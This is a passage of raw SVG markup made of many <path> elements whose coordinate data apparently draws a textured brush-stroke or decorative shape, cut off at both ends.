d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path 